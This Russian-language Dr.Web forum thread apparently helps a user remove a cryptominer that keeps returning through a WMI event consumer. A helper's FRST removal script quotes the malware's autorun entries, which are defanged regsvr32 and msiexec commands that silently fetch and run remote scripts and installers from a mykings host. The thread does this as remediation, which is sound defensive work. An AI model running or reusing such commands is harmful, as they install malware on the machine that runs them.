Newbie
Отправлено 09 Июль 2017 - 19:04
Уже в 5 раз я удаляю 2 файла которые используют ресурсы моего процессора(майнинг). Я не знаю что остаётся сделать кроме как снести систему заново. При обнаружении данных вирусов(dr web cureit), я сношу эти файлы, после перезагрузки их нету, но в течении часа работы системы они снова появляются, откуда я не знаю.
1.png 317,14К
3 Скачано раз
Poster
Отправлено 09 Июль 2017 - 19:04
1. Если Вы подозреваете у себя на компьютере вирусную активность и хотите получить помощь в этом разделе,
Вам необходимо кроме описания проблемы приложить к письму логи работы трёх программ - сканера Dr. Web (или CureIt!, если антивирус Dr. Web не установлен на Вашем ПК), Hijackthis и DrWeb SysInfo. Где найти эти программы и как сделать логи описано в Инструкции. Без логов помочь Вам не сможет даже самый квалифицированный специалист.
2. Если у Вас при включении компьютера появляется окно с требованием перечислить некоторую сумму денег и при этом блокируется доступ к рабочему столу,
- попытайтесь найти коды разблокировки здесь https://www.drweb.com/xperf/unlocker/
- детально опишите как выглядит это окно (цвет, текст, количество кнопок, появляется ли оно до появления окна приветствия Windows или сразу же после включении компьютера);
- дождаться ответа аналитика или хелпера;
3. Если у Вас зашифрованы файлы,
Внимание! Услуга по расшифровке файлов предоставляется только лицензионным пользователям продуктов Dr.Web, у которых на момент заражения была установлена коммерческая лицензия Dr.Web Security Space не ниже версии 9.0, Антивирус Dr.Web для Windows не ниже версии 9.0 или Dr.Web Enterprise Security Suite не ниже версии 6.0. подробнее.
Что НЕ нужно делать:
- лечить и удалять найденные антивирусом вирусы в автоматическом режиме или самостоятельно. Можно переместить всё найденное в карантин, а после спросить специалистов или не предпринимать никаких действий, а просто сообщить название найденных вирусов;
- переустанавливать операционную систему;
- менять расширение у зашифрованных файлов;
- очищать папки с временными файлами, а также историю браузера;
- использовать самостоятельно без консультации с вирусным аналитиком Dr. Web дешифраторы из "Аптечки сисадмина" Dr. Web;
- использовать дешифраторы рекомендуемые в других темах с аналогичной проблемой.
Что необходимо сделать:
- прислать в вирусную лабораторию Dr. Web https://support.drweb.com/new/free_unlocker/?keyno=&for_decode=1 несколько зашифрованных файлов и, если есть, их не зашифрованные копии в категорию Запрос на лечение. Дожидаться ответа на Вашу почту вирусного аналитика и далее следовать его указаниям ведя с ним переписку по почте. На форуме рекомендуется указать номер тикета вирлаба - это номер Вашего запроса, содержащий строку вида [drweb.com #3219200];
4. При возникновении проблем с интернетом, таких как "не открываются сайты", в браузерах появляются картинки с порно или рекламным содержанием там, где раньше ничего подобного не было, появляются надписи типа "Содержание сайта заблокировано" и пр. нестандартные уведомления необходимо выложить дополнительно к логам из п.1 лог команды ipconfig
Для этого проделайте следующее:
Newbie
Отправлено 09 Июль 2017 - 19:27
Уже в 5 раз я удаляю 2 файла которые используют ресурсы моего процессора(майнинг). Я не знаю что остаётся сделать кроме как снести систему заново. При обнаружении данных вирусов(dr web cureit), я сношу эти файлы, после перезагрузки их нету, но в течении часа работы системы они снова появляются, откуда я не знаю.
Вот предоставленные отчёты, я отключил антивирус, при диагностики. Диагностика проводилась при уже удалённых файлах.
hijackthis.log 5,7К
9 Скачано раз
KIRILPC_Kiril_090717_192424.zip 4,37Мб
5 Скачано раз
Guru
Отправлено 09 Июль 2017 - 19:42
Чот мне кажется, что лог HiJack неполный...
Личный сайт по Энкодерам - http://vmartyanov.ru/
Guru
Отправлено 09 Июль 2017 - 19:58
Логи Autoruns не помешали бы, для полноты картины...
Newbie
Отправлено 09 Июль 2017 - 20:25
Чот мне кажется, что лог HiJack неполный...
Вот полные логи, а то при запуски программы он мне жаловался на host файл, я запустил от имени администратора. Опять же я сканирования провожу когда эти файлы удалены, но что их восстанавливает я не знаю.
hijackthis.log 6,11К
2 Скачано раз
Сообщение было изменено Sempai1395: 09 Июль 2017 - 20:26
Newbie
Отправлено 09 Июль 2017 - 20:28
Логи Autoruns не помешали бы, для полноты картины...
Autoruns.rar 114,87К
5 Скачано раз
Сообщение было изменено Sempai1395: 09 Июль 2017 - 20:33
Poster
Отправлено 09 Июль 2017 - 20:47
fuckyoumm2_consumer Script embedded in WMI database Double click to open copy
Это что за покемон?
Poster
Отправлено 09 Июль 2017 - 20:48
fuckyoumm2_consumer Script embedded in WMI database Double click to open copy
Это что за покемон?
Как в этой теме
https://forum.drweb.com/index.php?showtopic=327606&p=828250
wmi скрипт
Newbie
Отправлено 09 Июль 2017 - 21:06
fuckyoumm2_consumer Script embedded in WMI database Double click to open copy
Это что за покемон?
Как в этой теме
https://forum.drweb.com/index.php?showtopic=327606&p=828250
wmi скрипт
fuckyoumm2_consumer Script embedded in WMI database Double click to open copy. Мне удалять этот скрипт???
Poster
Отправлено 09 Июль 2017 - 21:07
А как лечить....(((
Вот в этой теме Константин Юдин пишит:
Эта область слабо покрыта для анализа и лечения обычными тулзами
https://forum.drweb.com/index.php?showtopic=327751&p=829932
Newbie
Отправлено 09 Июль 2017 - 21:18
А как лечить....(((
Вот в этой теме Константин Юдин пишит:
Эта область слабо покрыта для анализа и лечения обычными тулзами
Сложнааааааа, я как понял нужно заархивировать все эти файлы с расширением mof, а дальше что делать не пойму?
Сообщение было изменено Sempai1395: 09 Июль 2017 - 21:18
Poster
Отправлено 09 Июль 2017 - 21:22
все файлы с расширением mof - заархивировать. ИМХО приложить к сообщению, а завтра технари глянут что там копать
Newbie
Отправлено 09 Июль 2017 - 21:25
все файлы с расширением mof - заархивировать. ИМХО приложить к сообщению, а завтра технари глянут что там копать
wbem(mof файлы).rar 5,32Мб
4 Скачано раз
Сообщение было изменено Sempai1395: 09 Июль 2017 - 21:25
Guru
Отправлено 09 Июль 2017 - 21:41
Удаление с помощью того же Autoruns - не помогает?
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Кроме уже установленных, отметьте галочками также "90 Days Files".
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к сообщению (можно все в одном архиве).
Сообщение было изменено Dmitry_rus: 09 Июль 2017 - 21:58
Newbie
Отправлено 09 Июль 2017 - 23:04
Удаление с помощью того же Autoruns - не помогает?
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Кроме уже установленных, отметьте галочками также "90 Days Files".Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к сообщению (можно все в одном архиве).
Дело не в том что не помогает, а в том что я и не пытался удалять, ибо не знаю какие будут последствия этого удаления этого скрипта.
Сообщение было изменено Sempai1395: 09 Июль 2017 - 23:08
Смотрящий
Отправлено 09 Июль 2017 - 23:29
Guru
Отправлено 09 Июль 2017 - 23:31
А где addition.txt?
Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:
CreateRestorePoint: HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q GroupPolicy: Restriction <==== ATTENTION GroupPolicy\User: Restriction <==== ATTENTION GroupPolicyScripts: Restriction <==== ATTENTION WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: U5 99351EFB0; C:\Windows\System32\Drivers\99351EFB0.sys Reboot:
и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool.
Отключите до перезагрузки антивирус, запустите FRST, нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
Сообщите, что с проблемой.
Сообщение было изменено Dmitry_rus: 09 Июль 2017 - 23:32
Смотрящий
Отправлено 09 Июль 2017 - 23:37
Poster
Отправлено 09 Июль 2017 - 23:48
U5 99351EFB0; C:\Windows\System32\Drivers\99351EFB0.sys - это Доктор - https://virustotalcloud.appspot.com/nui/index.html#/file/15f5ec97e9a3368a48a76312aeb8479b9d5a443d19b2a44f4dc56c9e8a437962/detection
<File Path="C:\windows\system32\drivers\99351efb0.sys" Size="59416" CreationTime="09.07.2017 16:03:34" LastAccessTime="09.07.2017 16:03:34" LastWriteTime="09.07.2017 16:03:34"><Attributes Archive="true" Value="00000020" /><Hash MD5="8AC89CFA1F195A530D3BF7CDFE781C66" SHA256="15F5EC97E9A3368A48A76312AEB8479B9D5A443D19B2A44F4DC56C9E8A437962" SHA1="97F3D9EB755819F7A3DAAEFB74BCEDAF04D94F1B" /><ArkStatus File="signed_drweb, pe64, driver (0x601000)" Cert="signed_drweb (0x4)" TStorm="unknown (0xFFFFFFFF)" /><CertInfo Status="signed_drweb" TimeStamp="14.07.2016 14:17:23"><Signature Subject="C=RU|ST=Moscow|L=Moscow|O=Doctor Web Ltd.|CN=Doctor Web Ltd."
Сообщение было изменено Dmitry Shutov: 09 Июль 2017 - 23:49
0 пользователей, 0 гостей, 0 скрытых
Community Forum Software by IP.Board
Владелец лицензии: Doctor Web, Ltd.
